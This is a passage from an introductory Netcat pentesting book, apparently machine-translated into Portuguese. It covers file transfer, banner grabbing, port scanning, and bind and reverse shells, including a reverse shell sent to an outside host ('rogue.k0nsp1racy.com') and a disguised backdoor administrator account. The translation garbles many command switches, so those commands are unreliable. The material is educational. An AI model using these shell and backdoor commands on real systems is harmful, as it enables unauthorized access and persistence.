Oracle VirtualBox http://www.oracle.com/technetwork/server-storage/virtualbox/

Reprodutor VMware
PC virtual da Microsoft
downloads/index.html
https://my.vmware.com/web/vmware/
evalcenter?p=player
http://www.microsoft.com/windows/virtual-pc/
download.aspx

Para este exercício, vou me conectar à porta TCP31337.Este número de porta pode ser qualquer
coisa; Eu escolhi31337sem motivo especial. Para ilustrar a relação entre um endereço IP e um
número de porta, pense em como a agência postal entrega o correio para você. Se você considerar
que seu endereço de rua é análogo a um endereço IP, uma porta pode ser pensada como o nome
no envelope. Cabe ao remetente identificar a pessoa específica para a qual o e-mail se destina. Se
tudo correr bem, o destinatário reconhecerá que o correio é destinado a uma pessoa específica.
Claro, talvez o remetente saiba que John, Mary, Jane e Gregory moram no endereço, 123 Main
Street. Neste ponto, o remetente só precisa especificar que a carta é destinada a Gregory.
Independentemente da porta selecionada, depois de configurar o cliente e o ouvinte, vamos em
frente e começar com o exercício. Na máquina do ouvinte,

24
 Iniciador Instantâneo do Netcat

1. Inicie um prompt de comando se o sistema operacional do ouvinte for baseado em Windows, como
no exemplo anterior (você abriria um shell usando um terminal no Unix e no Linux).

2. Digite o seguinte comando:

nc –l –p 31337

No exemplo anterior, iniciamos o Netcat no modo ouvinte invocando o –eu

trocar. Especificamos o utilitário para escutar na porta TCP31337invocando o -p
trocar. Alternativamente, o Netcat permite que você concatene switches também,
então eu poderia ter feito a mesma coisa digitandonc-lp 31337.
Você notará que o cursor está imediatamente abaixo do prompt de comando. Assim que
começarmos a enviar pacotes brutos, é aqui que eles aparecerão. Neste ponto, temos apenas uma
extremidade da conexão aberta, então vamos estabelecer a outra extremidade da conexão agora
com nossa máquina cliente.

3. Inicie um shell usando o terminal.

4. No prompt do shell, digite o seguinte comando:

nc 192.168.0.10 31337

Com nosso ouvinte Netcat ativado no host192.168.0.10,completamos a outra extremidade da

conexão especificando o host ao qual queríamos nos conectar, seguido pelo número da
porta. Neste ponto, temos um soquete totalmente estabelecido e não criptografado entre o
cliente e o ouvinte. Vamos demonstrar isso digitando uma mensagem do cliente.

5. Na máquina cliente, digitemensagem do cliente para o ouvintee baterEntrar. A

captura de tela a seguir mostra o que o cliente vê no terminal:

25
Iniciador Instantâneo do Netcat

6. Se você alternar para o console do ouvinte, verá que a captura de tela a

seguir demonstra o que o ouvinte vê:

Agora, vamos simplesmente inverter a direção e enviar a comunicação do ouvinte

para o cliente.

7. No ouvinte, digitemensagem do ouvinte para o clientee baterEntrar. A

captura de tela a seguir mostra o que o ouvinte vê:

8. Alternando para a sessão do cliente, a próxima captura de tela mostra o que o cliente vê:

Após completar o exercício, enviar a combinação de teclasCtrl+Cem ambos os lados terminará a

conexão. É importante observar que, se você quiser restabelecer a conexão, precisará iniciar o
ouvinte novamente ao usar o –eutrocar. O Netcat pode ser executado com o –eu
(L maiúsculo) apenas no utilitário do Windows e, quando uma conexão for encerrada, o ouvinte
permanecerá aberto.

Passo 2 – transferindo dados com Netcat

No próximo exercício, vamos executar uma transferência básica de arquivos do papel de um testador de penetração
ou hacker ético usando o Netcat. Mais uma vez, usaremos a mesma configuração do exercício anterior. Um cenário
simples é que um administrador de servidor júnior esquecido deixou um arquivo, chamado
segredo.txtno servidor Windows e o arquivo contém um nome de usuário e uma senha (consulte a captura de tela a
seguir para obter o conteúdo do arquivo). Infelizmente, o servidor não está executando nenhum bom utilitário de FTP
ou outros aplicativos que nos permitam realizar uma transferência de arquivos. Como resultado, vamos recorrer ao
nosso confiável utilitário Netcat para nos ajudar em uma situação difícil. Com o Netcat, é importante entender que os
arquivos são transferidos de forma bruta, sem nenhum tipo de caractere especial ou outras indicações de que um
arquivo é transferido. O Netcat simplesmente processa o arquivo, não criptografado, e aguarda.

26
 Iniciador Instantâneo do Netcat

No computador de escuta, o Windows Server, vamos simplesmente digitar o

seguinte comando:

nc –v –w 30 –p 31337 –l < secret.txt

Você notará que há algumas novas opções que adicionamos ao comando, então vamos analisá-
las agora. O -vswitch é o parâmetro para usar o Netcat no modo detalhado.Verbosidade
é simplesmente a quantidade de feedback que o utilitário fornece de volta à tela durante a operação. O Netcat
também suporta –vv (double v) para detalhamento adicional que fornecerá o número de bytes transferidos
durante uma transferência de arquivo. O -Cswitch instrui o Netcat a aguardar um número específico de
segundos antes de atingir o tempo limite da conexão. Em nosso exemplo, especificamos 30 segundos. Com
exceção dos ouvintes baseados no Windows, se não iniciarmos a transferência em 30 segundos, o Netcat
lançará um erro de tempo limite de conexão e sairá em um prompt. Os ouvintes baseados em Windows (como
mostra nosso exemplo) não respeitam os 30 segundos para iniciar, mas terminarão 30 segundos após a
conclusão da conexão ou se as comunicações forem interrompidas durante o fluxo de dados. Discutimos o –p
switch e indicou-o como a porta na qual o Netcat estará escutando. Novamente, selecionamosTCP/31337como
nossa porta de escuta. O -euswitch indica que o Netcat está no modo Listener. O símbolo < indica a direção da
transferência. Se você não estiver familiarizado com o redirecionamento de arquivos, pense no comando inteiro
dizendo: "Quero enviar o
segredo.txtarquivo para o ouvinte". Mais tarde, veremos o outro lado da conexão, que
basicamente dirá: "Pegue a saída do ouvinte e envie-a para um arquivo que eu especificar".

Uma vez que batemosEntrar, nosso ouvinte começa a ouvir conforme ilustrado na captura de tela a
seguir. Você notará que com a opção de verbosidade habilitada, vemos que o status é exibido.
Normalmente, haveria simplesmente um cursor piscando.

27
Iniciador Instantâneo do Netcat

Agora vamos passar para o cliente. Nosso comando é semelhante, mas há algumas pequenas diferenças que
explicarei em um segundo. Por enquanto, basta executar a seguinte etapa, conforme ilustrado na próxima
captura de tela, digitando o seguinte comando na linha de comando:

nc –v –w 2 192.168.0.10 31337 > secret.txt

Então, vamos revisar as opções e comandos que acabamos de inserir. Novamente, o –vswitch é para
verbosidade. O -Cswitch especifica que, se a conexão for interrompida por mais de dois segundos, abortará o
fluxo. Se você se lembra, configuramos o ouvinte por 30 segundos. Então, por que definimos o cliente para 2?
A resposta simples é que as funções dos dispositivos ditavam que o servidor (ouvinte) provavelmente seria
afetado por várias solicitações e várias operações. Obviamente, esses são parâmetros arbitrários, portanto,
sua milhagem varia.

O restante do comando especifica o nome do host ou o endereço IP do ouvinte, seguido pelo número da
porta. Finalmente, chegamos ao outro lado do redirecionamento. Como mencionado antes, pense nisso
como "pegue o que quer que192.168.0.10:31337está servindo e a saída para o arquivosegredo. TXT".É
importante observar que o nome do arquivo aqui não precisa ser idêntico ao nome do arquivo no
ouvinte. Chame-obob.txtouid10t.gde;o ponto é, ele simplesmente não tem que ser o mesmo.

À medida que a transferência está ocorrendo, o ouvinte mostrará apenas a tela conforme ilustrado na
captura de tela a seguir:

28
 Iniciador Instantâneo do Netcat

Simultaneamente, a perspectiva do cliente é mostrada na captura de tela a seguir:

Eventualmente, quando a transferência for concluída, a sessão expirará (graças ao –C

parâmetro no ouvinte). As próximas duas capturas de tela mostram a saída na tela após a
conclusão da transferência. Primeiro, mostraremos a saída da perspectiva do ouvinte.

Em seguida, demonstramos a saída da perspectiva do cliente na captura de tela a seguir:

Por fim, podemos verificar a saída do novo arquivo que foi criado em nossa máquina cliente para verificar se o
texto é idêntico, conforme ilustrado na captura de tela a seguir:

29
Iniciador Instantâneo do Netcat

Neste exemplo muito básico, executamos uma transferência de arquivo entre o ouvinte e o cliente
usando nada mais do que o Netcat como canal. . A esta pergunta, respondemos que o poder do
Netcat está em sua flexibilidade e simplicidade. Com muito pouca sobrecarga, temos a capacidade
de mover arquivos entre duas (ou mais) máquinas em qualquer porta que precisarmos. É um
firewall bloqueando a porta TCP21?Mude o Netcat para uma porta aberta, ou seja,TCP/80e você
está fora para as corridas. O Netcat não é a solução de transferência de arquivos ideal para todas
as situações, mas minha intenção aqui é apenas demonstrar alguns recursos básicos e preparar as
bases para usos mais complicados.

O Netcat acabou de substituir meu arquivo!

Uma coisa com a qual você precisará ser particularmente cuidadoso é

sobrescrever arquivos que já existem em seu sistema. Ao usar os
redirecionadores únicos, < e >, o Netcat não irá avisá-lo ou avisá-lo antes de
iniciar a transmissão de dados do fluxo. O Netcat suporta redirecionadores
duplos, << e >>, que permitem anexar a um arquivo em vez de sobrescrevê-lo.

Passo 3 – pegando banner com Netcat

Às vezes, podemos precisar interrogar um determinado serviço ou porta para ver o que está acontecendo,
porque não é imediatamente óbvio. Por exemplo, pense na enorme quantidade de cavalos de Tróia e outros
aplicativos que podem estar sendo executados em uma porta estranha. Como alternativa, talvez você esteja
realizando um teste de penetração e precise interrogar um servidor da Web para determinar a versão e o nível
de patch que o servidor está executando. Para todos aqueles que não estão muito familiarizados com o Netcat,
uma solução comum para conseguir isso é através do Telnet. No entanto, como explicamos, aplicativos como o
Telnet alteram o fluxo de dados e podem produzir resultados imprevisíveis. Como o Netcat não altera o fluxo de
dados, é uma ferramenta ideal para usar em banners. Então vamos em frente e ver o que temos e tentar. A
captura de tela a seguir descreve o ambiente.192.168.0.10parece ser um servidor web de algum tipo. Para o
propósito deste exercício, vamos supor que descobrimos que a porta TCP80foi listado como aberto com base em
uma simples varredura de porta do host.

Cliente Netcat
192.168.0.11/24
GNU Netcat 0.7.1
Linux Mint

Servidor Web Desconhecido

192.168.0.10/24

30
 Iniciador Instantâneo do Netcat

A sintaxe para executar uma captura básica de banner de um destino é simplesmente usar o endereço de
destino ou o nome do host e a porta a ser interrogada. A partir de nossa máquina cliente, realizamos as
seguintes etapas:

1. Digite os seguintes comandos conforme ilustrado no código e na captura de tela a seguir:

nc 192.168.0.10 80
<enter>
<enter>

<enter>

2. Os comandos anteriores acionarão uma resposta do servidor web da seguinte forma:

No exemplo anterior, estabelecemos uma conexão simples com uma porta em nosso servidor web de destino.
Nessa situação específica, não estávamos preocupados com o sigilo e, portanto, simplesmente abrimos a
conexão, enviamos um fluxo inesperado para o servidor e o convencemos a nos informar que cometemos um
erro em nossa solicitação, conforme evidenciado pelo código de status HTTP do400.Nessa situação, descobrimos
o que queríamos, que era a versão do aplicativo do servidor web. Em um cenário mais realista, não seríamos tão
ousados em simplesmente forçar uma resposta como essa, pois nosso endereço IP e detalhes estão em todo o
log do servidor. Em vez disso, provavelmente procuraríamos interrogar o serviço de uma maneira que aderisse
ao protocolo do serviço.

As opções que você tem com a captura de banner são limitadas apenas pelo protocolo e funções do
próprio serviço. Lembre-se, você está estabelecendo um soquete bruto entre seu cliente e o servidor
web. No próximo exemplo, vamos fazer a mesma técnica básica, só que ao invés de fazer tanto barulho,
vamos usar a sintaxe do protocolo e falsificar alguns detalhes da conexão.

31
Iniciador Instantâneo do Netcat

Mais uma vez, digite a seguinte sintaxe conforme mostrado no código e ilustrado na captura de tela
a seguir:

nc 192.168.0.10 80
GET/HTTP/1.1
Anfitrião: 192.168.0.10
Agente do usuário: SPOOFED-BROWSER
Referenciador: K0NSP1RACY.COM
<enter>
<enter>

O servidor web responde com um código de status HTTP de200,significando OK. Como você vê na
captura de tela a seguir, o servidor da Web envia o código HTML para a conexão. Dependendo do seu
propósito para iniciar a conexão, você pode se camuflar nos logs do servidor ou facilitar a localização de
suas informações de conexão específicas.

Neste ponto do livro, você deve começar a ter uma noção de algumas das coisas que são possíveis
com um mínimo de esforço usando o Netcat. Embora o Netcat seja um utilitário compacto, ele tem um
poder incrível nas mãos de um profissional capaz. Com alguns dos casos de uso básicos e uma noção
geral do próprio utilitário, podemos começar a explorar alguns casos de uso e recursos mais
avançados do utilitário na próxima seção.

32
 Iniciador Instantâneo do Netcat

Os 3 principais recursos que você vai querer conhecer

Então, até este ponto, eu facilitei a sintaxe e alguns dos usos mais comuns do Netcat em um nível
muito básico. Neste ponto, você deve se sentir um pouco confortável, então para esta seção vamos
progredir em alguns (mais ou menos) cenários reais para mostrar algumas das coisas que você pode
fazer com este utilitário.

Usando o Netcat para obter um shell remoto em um computador de destino

Neste recurso, vamos demonstrar como é fácil obter um shell remoto em um sistema de computador
de destino. Na vida real, seria necessário empurrar o executável do Netcat e iniciá-lo usando algo como
Meterpreter dentro do Metasploit, ou empacotar o binário com alguns parâmetros e enganar o usuário
final para iniciar o código. Ambos estão fora do escopo deste livro. O que vou demonstrar nestas etapas
é obter o shell no Windows e no Linux, validar os direitos de acesso e adicionar um backdoor para
permitir mais opções posteriormente. Assim como os exercícios da seção anterior, explicarei as opções
e parâmetros que estamos usando.

Shell remoto do Windows (e simples hi-jinks pós-exploração)

Para começar, vamos gerar um shell remoto em uma plataforma Windows nas seguintes etapas:

Preparando o ouvinte
Para preparar o ouvinte, digitaremos o seguinte comando na linha de comando:

nc –Lp 31337 –vv –e cmd.exe

No exemplo anterior, estamos usando a chave L maiúsculo (-EU)para manter uma conexão
persistente com o ouvinte. Este é apenas um recurso do Windows e, embora seja possível criar um
script para fazer algo semelhante no lado do Linux, não abordaremos isso neste livro. Lembre-se de
que, em uso típico, quando nos desconectamos da máquina cliente, o executável do Netcat é
encerrado. Com o -euswitch, o executável continua a escutar novas tentativas de conexão.

O -vvswitch diz ao Netcat para ser mais detalhado com sua saída. Para este recurso específico, o –vvswitch não
fará muito; no entanto, em transferências de arquivos e outros casos de uso, isso acontecerá, como veremos
mais adiante.

33
Iniciador Instantâneo do Netcat

O -eswitch é onde a mágica acontece. Conforme observado noInstalaçãoseção, o -eswitch indica o

recurso DGAPING_SECURITY_HOLE e nos permite fazer as coisas tortuosas que estamos prestes a fazer.
cmd.exeé o nome do executável para um shell de comando no Windows. Agora, dado o contexto e as
etapas explicadas anteriormente, talvez seja mais compreensível por que os pacotes antivírus e firewalls
sinalizam o Netcat como potencialmente malicioso.

Conectando-se ao destino
Conectar-se ao alvo é tão simples quanto nossos primeiros exercícios e consiste simplesmente na
seguinte string:

nc 192.168.0.10 31337

Executando uma listagem de diretórios no destino

Assim que o shell de comando do Windows for iniciado, podemos interagir com ele como se estivéssemos usando o
Telnet ou trabalhando diretamente no console.

Conforme mostrado na captura de tela anterior, simplesmente executamos uma listagem de diretórios usando odiretório /w

comando. Embora esteja fora do escopo de demonstrar os recursos do Netcat, uma vez nesta etapa,
você pode interagir com o shell remoto da mesma maneira como se fosse um shell local.

Fazendo um diretório no destino

Neste ponto, do ponto de vista da segurança da informação, exploramos o computador e podemos iniciar o
trabalho de pós-exploração. De uma perspectiva de operações legítimas, você seria capaz de ler arquivos de log
e realizar a solução de problemas de linha de comando. Como uma demonstração simples, crie um diretório
usando omd <nome do diretório>comando (eu chamei o meupwn3d),conforme mostrado na captura de tela a
seguir:

34
 Iniciador Instantâneo do Netcat

Verificando o diretório foi criado

Uma vez omd pwn3dcomando é emitido, podemos verificar se o diretório foi criado.

Adicionando um usuário local e concedendo direitos de administrador

Apenas para terminar a demonstração, adicionarei um usuário local ao sistema e concederei a essa conta
direitos de administrador local. Digite o seguinte comando:

net user /add bob Netcat /comment:"Aprovado até 31/12/2012 por CTO" /nome
completo:"Bob Wilson"

35
Iniciador Instantâneo do Netcat

Ele criará a conta com todos os campos mais óbvios preenchidos. Com a conta de usuário adicionada,
simplesmente digito o comandonet localgroup administradores bob /addpara conceder os direitos de
administrador da conta recém-criada, conforme mostrado na captura de tela a seguir:

Agora, para completar, vou gerar oUsuários e grupos locaisrecipiente emGerenciamento de

Computadorpara verificar se a conta foi criada. Observe que, embora o comando net user esteja
perfeitamente satisfeito apenas com os parâmetros de nome de usuário e senha, gostaria de adicionar o
nome completo e comentários para tornar a conta mais autêntica para o observador casual.

36
 Iniciador Instantâneo do Netcat

Se eu abrir a associação do grupo para oAdministradoresgrupo, posso ver que nossa conta de usuário prumoagora
é um membro, conforme mostrado na captura de tela a seguir:

Outro item muito importante a ser observado com o Netcat é que não importa de que lado está o ouvinte e
de que lado está o cliente. Suponha que eu estava executando um ouvinte Netcat na portaTCP/80
em um host (rogue.k0nsp1racy.com)fora de um firewall (conforme mostrado na captura de tela a
seguir) e executei o seguinte comando de dentro dos limites da minha rede corporativa para iniciar
um shell de comando:

nc rogue.k0nsp1racy.com 80 –e cmd.exe

Supondo que as regras de firewall sejam permitidas, eu poderia criar um túnel não criptografado entre
as duas máquinas da seguinte forma:

37
Iniciador Instantâneo do Netcat

shell remoto Linux

Obter um shell remoto em uma máquina Linux é muito semelhante a fazê-lo no Windows. No entanto, há
algumas coisas que aparecem de forma diferente. Primeiro, quando você se conecta a um shell do Windows, é
apresentado um prompt de usuário que o ajuda a se orientar. No entanto, no lado do Linux, você não verá
esse prompt. Demora um pouco para se acostumar, mas não deve afetar drasticamente as operações. Em
segundo lugar, mencionei noInstalaçãoseção que o Netcat executa no contexto do usuário que iniciou o
processo. Na minha máquina Linux Mint, minha conta de usuário não é um usuário root. Portanto, para atingir
os mesmos objetivos do Recurso anterior do Windows, preciso fazer uma concessão e executar o Netcat por
meio do sudo. Isso me permitirá replicar os recursos anteriores tão próximos quanto o recurso anterior para
fornecer uma comparação de maçã para maçã. Assim, conforme mencionado anteriormente, realizaremos as
seguintes etapas:

Preparando o ouvinte
Como fizemos no lado do Windows, para preparar o ouvinte, digitaremos o seguinte comando
na linha de comando:

sudo nc –lp 31337 –e /bin/bash

Como vemos na captura de tela a seguir, estamos simplesmente chamando o /bin/bashshell na

conexão, que é equivalente ao prompt de comando do Windows. No entanto, ao contrário da
contraparte do Windows, o switch L maiúsculo significa algo completamente diferente no GNU
Netcat e nem existe no Unix Netcat original.

Conectando-se ao destino
Como demonstrei no exercício anterior, você simplesmente se conecta ao host (como
mostrado abaixo) e à porta à qual deseja se conectar, e o ouvinte fornecerá o shell bash da
seguinte maneira:

nc 192.168.0.11 31337

38
 Iniciador Instantâneo do Netcat

Executando uma listagem de diretórios no destino

Conforme mencionado na seção anterior, o lado do Linux não fornece o mesmo nível de feedback
para me informar se tenho um shell bash. No entanto, digitando uns no shell, vemos que
retornamos uma lista dos diretórios e arquivos no sistema remoto, conforme mostrado na captura
de tela a seguir:

Fazendo um diretório no destino

Conforme demonstrado na captura de tela a seguir, criei um diretório chamadopwn3dusando o
mkdircomando e o comando completo émkdir pwn3d:

39
Iniciador Instantâneo do Netcat

Verificando se o diretório foi criado

Após realizar outralscomando, conforme demonstrado na captura de tela a seguir,
vemos que o diretório, de fato, foi criado:

Adicionando um usuário local e colocando no grupo raiz

Por fim, utilizamos ousuário adicionarcomando para adicionar um usuário local ao sistema e conceder a conta
prumoAcesso aoraizgrupo. Isso, mais uma vez, é demonstrado da seguinte forma:

useradd –g root bob

40
 Iniciador Instantâneo do Netcat

Em seguida, queremos fornecer a verificação dausuário adicionaração, primeiro fazendo um simples grep
sobre /etc/senha,conforme mostrado na próxima captura de tela usando o seguinte comando:

grep bob /etc/passwd

Por último, vamos despejar todo o /etc/senhaarquivo em seguida usando o seguinte comando:

cauda /etc/passwd

41
Iniciador Instantâneo do Netcat

Verificação de portas com Netcat

Quando a maioria das pessoas pensa em scanners de portas e capacidades de varredura de portas, eles geralmente não
pensam no Netcat da mesma forma que ferramentas como Nmap, Angry IP Scanner ou SuperScan da Foundstone. No
entanto, o Netcat pode executar recursos básicos de varredura de porta e ainda oferece a capacidade de ofuscar a
origem da varredura de porta. As seguintes etapas serão tomadas para demonstrar esse recurso:

Verificação básica de portas em relação a um destino

A varredura de portas usando o Netcat não requer um ouvinte, então podemos executá-lo diretamente do nosso
cliente. Nesta etapa, estarei executando uma varredura básica de portas de um utilitário GNU Netcat. Tenha em
mente que um objetivo do projeto GNU Netcat é manter a compatibilidade com o Unix Netcat original, então todos
esses comandos devem funcionar independentemente do sabor do Netcat que você está executando. A sintaxe básica
é a seguinte:

nc –v –w 1 192.168.0.10 –z 1-1000

Até agora, muitos desses switches devem ser familiares. O -vé para verbosidade, que em nossa varredura de
portas indica as portas abertas que a varredura de portas descobre. O -w 1O parâmetro instrui o Netcat a
esperar um segundo entre as tentativas de varredura, ou em outras palavras, indica quanto tempo ele precisa
esperar para uma porta responder como aberta ou fechada. Em seguida é o destino que queremos verificar, que
neste exemplo é192.168.0.10.O -zswitch é novo e indica que o Netcat deve operar no modo de E/S zero. O modo
Zero I/O, neste caso, acelera o processo de execução da varredura de porta, ignorando qualquer latência
incorporada pelo programa para explicar os atrasos da CPU. Por fim, especificamos o intervalo de portas a ser
verificado. Conforme listado na seção anterior, a verificação de portas visa apenas as portas TCP e não as portas
UDP. Se quiséssemos escanear portas UDP, poderíamos especificar o
- vocêtrocar. Outro interruptor que poderíamos usar é o –ntrocar. Por padrão, o Netcat utilizará o DNS para
procurar o endereço IP do host. Embora tenhamos usado endereços IP exclusivamente em nossos exemplos
deste livro, poderíamos usar nomes de host com a mesma facilidade. O -nswitch ignora a resolução de nomes, o
que em certos casos pode reduzir sua pegada nos logs.

42
 Iniciador Instantâneo do Netcat

Verificação de porta aleatória em relação a um alvo

Pode haver momentos em que você queira ser um pouco mais cauteloso ao alertarSistemas de Detecção de Intrusão
(IDS)ouSistemas de Prevenção de Intrusão (IPS)de suas atividades de varredura de portas. Simplesmente executar uma
varredura de portas em uma variedade de portas em ordem consecutiva é quase uma maneira segura de ser
detectado. Embora a maioria dos sistemas IDS/IPS seja inteligente o suficiente para detectar uma varredura aleatória,
você pode randomizar suas portas e passar como não detectado. As chances são certamente maiores de evitar a
detecção com portas aleatórias do que sequenciais; no entanto, sua milhagem pode variar. Essencialmente, vamos
usar a mesma sintaxe, só que desta vez vamos adicionar o –rswitch, que instrui o Netcat a randomizar a varredura de
porta.

nc –v –r –w 1 192.168.0.10 –z 1-1000

Verificação mais detalhada em um alvo

Às vezes, quando você precisa produzir evidências de um teste de penetração, pode querer ver
definitivamente o status de cada porta, independentemente de estar aberta ou fechada. Para fazer isso,
vamos nos voltar para a opção mais detalhada –vv.Isso produzirá cada porta e verificará se ela foi aberta
ou fechada. O código a seguir é o que executaremos para realizar a varredura. Observe que, por
brevidade, limitarei as portas para que todas caibam na captura de tela a seguir:

nc –vv –r –w 1 192.168.0.10 –z 20-30

43
Iniciador Instantâneo do Netcat

Verificando uma variedade de dispositivos com um script

Até este ponto, evitamos aproveitar o poder dos scripts para aprimorar a capacidade do Netcat de operar em
uma variedade de casos de uso. Nós simplesmente não queríamos nos distrair do próprio utilitário e fazer com
que você solucionasse vários scripts. No entanto, ao verificar um intervalo de hosts, devemos fazê-lo em um
script. Já faz algum tempo desde que eu fiz scripts de shell sérios, mas esta última etapa lhe dará uma idéia do
que podemos fazer com o poder dos scripts. O trecho de código a seguir é essencialmente umparaconstrução
de loop, com uma simples substituição de variável:

para i em {10..12}; do nc –vv –n –w 1 192.168.0.$i 21-25 –z; feito

Em pseudocódigo, o loop a seguir está realizando as seguintes tarefas:

"Para cada endereço IP,192.168.0.10, 192.168.0.11,e192.168.0.12,retornar os resultados (se

abertos, fechados ou expirados) de cada porta entreTCP/21eTCP/25.Não se preocupe com a
resolução de nomes e espere um segundo entre as conexões."

Na próxima captura de tela, vemos a saída como ela existe no meu segmento de laboratório:

Outros interruptores importantes do Netcat

Ao longo deste livro, tentei incorporar o uso de tantos switches que o Netcat oferece dentro dos limites
de um caso de uso realista para alguém que acabou de se familiarizar com o utilitário. Com a intenção
deste livro de ajudá-lo rapidamente a se familiarizar com o Netcat, existem apenas algumas opções que
teriam prejudicado o propósito geral deste livro se eu tivesse entrado neles. Então, vamos dar uma
olhada superficial em algumas das outras chaves disponíveis, e tentarei explicá-las de uma maneira que
não simplesmente regurgite o arquivo de ajuda.

44
 Iniciador Instantâneo do Netcat

Se realizarmos um dump do arquivo de ajuda, como demonstramos na próxima captura de tela, a

primeira opção que não abordamos foi a –dparâmetro. Haverá momentos em que você desejará
executar o Netcat sem que a vistosa janela do prompt de comando fique visível para todos. O
– dswitch executa o utilitário Netcat em um modo de segundo plano, portanto, não é imediatamente visível na
tela. Lembre-se de que, mesmo que o executável não apareça na tela, ele é visível pelo gerenciador de tarefas e
o tráfego ainda é visível pelo sniffer. O caso de uso mais comum para querer usar o –dswitch é se você estiver
usando o Netcat como um Trojan de algum tipo ou quiser evitar a detecção de um usuário casual do sistema.

Os próximos interruptores são os –ginterruptor e -Gtrocar. O -gswitch permite forçar um fluxo de

dados a seguir um caminho específico pela rede. O -Gswitch ajuda a rastrear a conexão pelo
caminho da rede e é usado principalmente para solução de problemas de rede com o Netcat.

O -oswitch permite que o Netcat sirva como um sniffer rudimentar, semelhante à saída bruta de um dump
hexadecimal. Um cenário que aproveita esse tipo de opção seria se você configurasse o Netcat como o
intermediário entre cliente(s) e servidor. Com o -oswitch, seria relativamente simples pegar senhas ou outros
dados confidenciais à medida que estivessem atravessando sua conexão. O -oswitch despeja os dados brutos
em um arquivo de sua escolha, onde podem ser coletados e examinados posteriormente.

O -sswitch é usado para ancorar o soquete em um dispositivo que possui várias interfaces atribuídas. Como o -pswitch,
o Netcat pode se ligar a qualquer interface que seja local e tenha privilégios para. Eu nunca usei essa opção específica,
embora o arquivo LEIA-ME do Netcat especifique um caso de uso da seguinte forma:

45
Iniciador Instantâneo do Netcat

"Você pode usar o Netcat para proteger o servidor X de sua própria estação de trabalho contra acesso
externo. O X é estúpido o suficiente para escutar conexões em qualquer servidor e nunca lhe diz quando
uma nova conexão chega, o que é uma razão pela qual é tão vulnerável. suas várias janelas X
funcionando, você pode usar o Netcat para vincular apenas ao seu endereço Ethernet e ouvir a porta
6000. Qualquer nova conexão de fora da máquina atingirá o Netcat em vez de seu servidor X, e você
obterá um log de quem está tentando fazer isso. Servidor X ativadolocalhost.Isso pode não funcionar para
terminais X dedicados, mas pode ser possível autorizar seu terminal X apenas para seu servidor de
inicialização e executar um Netcat de retransmissão no servidor que, por sua vez, se comunicará com seu
terminal X. Como o Netcat lida apenas com uma conexão de escuta por execução, certifique-se de que,
seja qual for a maneira de rig, faça com que outra seja executada e ouça em 6000 logo depois, ou seu
servidor X real estará acessível novamente. Um script muito mínimo apenas para se proteger pode ser o
seguinte:

enquanto verdadeiro; Faz

nc -v -l -s - p 6000 localhost 2
feito

Isso faz com que o Netcat aceite e feche qualquer conexão de entrada para o endereço Ethernet normal da sua estação
de trabalho, e outra cópia é executada imediatamente pelo script. Envie um erro padrão para um arquivo para um log
de tentativas de conexão. Se o seu sistema não pode fazer oligação específicacoisa nem tudo está perdido; execute seu
servidor X em exibição:1ou porto6001,e o Netcat ainda pode funcionar como um alarme de sonda escutando6000" [
Fonte: arquivo LEIA-ME do Netcat].

46
 Iniciador Instantâneo do Netcat

Pessoas e lugares que você deve conhecer

Se você precisar de ajuda com o Netcat, ou hacking em geral, a seguir está uma lista de algumas
pessoas e lugares que serão inestimáveis:

Sites oficiais
Ê Página inicial do Unix Netcat:http://nc110.sourceforge.net/
Ê Projeto GNU Netcat:http://netcat.sourceforge.net/
Ê Ncat – O Projeto Nmap:http://www.nmap.org/ncat

Artigos e tutoriais
Ê A Offensive Security explica como criar uma backdoor persistente usando o Netcat e o
Meterpreter do Metasploit:
http://www.offensive-security.com/metasploit-unleashed/Persistent_Netcat_Backdoor

Ê Relés Netcat loucos para diversão e lucro:

http://pauldotcom.com/wiki/index.php/Episode195#Tech_Segment:_Crazy-
Ass_Netcat_Relays_for_Fun_and_Profit

Ê Folha de dicas de bolso do SANS Institute Netcat:

http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf

Ê Alguns casos de uso interessantes não abordados neste livro de Johannes Franken:
http://www.jfranken.de/homepages/johannes/vortraege/netcat.en.html

Ê Uma ótima referência para usar o Netcat para depurar serviços Web SOAP e XML usando o
Netcat:
http://parand.com/say/index.php/2005/03/11/simple-recipe-fordebugging-web-
services/

Blogues e sites
Ê Hackers for Charity é uma organização fantástica que está impactando a vida de tantas
pessoas ao redor do mundo. Tenho orgulho de chamar Johnny Long de meu amigo e
recomendo que você retribua à comunidade através desta organização.
A ligação éhttp://www.hackersforcharity.org/.
Ê Vivek Ramachandran e os colaboradores do SecurityTube estão prestando um excelente
serviço aos profissionais de segurança da informação, reunindo excelentes tutoriais,
treinamento e certificações. Se você nunca visitouhttp://www.securitytube.org,você está perdendo
uma grande oportunidade de aprender habilidades em várias áreas.

47
Iniciador Instantâneo do Netcat

Ê Segurança da Informação é uma profissão repleta de personalidades de todos os tipos. Há

vendedores de óleo de cobra e ciganos que se aproveitarão da arte mística da segurança da
informação. Meus amigos emAttrition.orgajudar a policiar e expor alegações fraudulentas feitas
por charlatães, detectar plágio de materiais de praticantes legítimos e expor o submundo de
uma profissão honrosa. Sua pesquisa é sempre bem avaliada e completa, então você pode ter
certeza de que, se uma entidade encontrar seu nome em sua lista, há um bom motivo. Por
favor, verifique o site deles emhttp://attrition.org/ erratae ajude os sólidos administradores da
indústria expondo e expulsando aqueles que merecem ser exilados.

Ê Muitas conferências de segurança têm um custo proibitivo para o praticante médio. Os

organizadores das conferências da comunidade B-Sides estão fazendo coisas maravilhosas ao
fornecer conferências locais de alta qualidade a um custo muito baixo (geralmente gratuito). Sou
amigo de muitos dos organizadores e participantes, e eles são absolutamente algumas das melhores
pessoas do setor. Confira-os emhttp://www.securitybsides.com,e encontre uma conferência perto de você
(ou organize uma você mesmo).

Ê Finalmente, um site que é próximo e querido para mim pessoalmente não é um site
de hackers em si, mas fala da questão muito real e muito séria do estresse e do
esgotamento no setor de segurança da informação. Tive a sorte de me juntar a Josh
Corman (@joshcorman),Gal Shpantzer (@shpanzer),Jack Daniel (@Jack Daniel),Stacy
Thayer(@Stacythayer),e Martin McKeay (@McKay)
fornecer pesquisas e aumentar a conscientização sobre o desgaste psicológico em informações
segurança. Nosso site éhttp://www.itburnout.org.

Twitter
As pessoas a seguir contribuem muito para a comunidade Netcat e estão entre as melhores do
setor de segurança da informação. Eu encorajo a segui-los no Twitter e conhecê-los na vida real
também.

Ê Siga Thomas Wilhelm no Twitter:

https://twitter.com/#!/thomas_wilhelm

Ê Siga Brian Baskin no Twitter:

https://twitter.com/#!/bbaskin

Ê Siga Michael Scherer no Twitter:

https://twitter.com/#!/theprez98

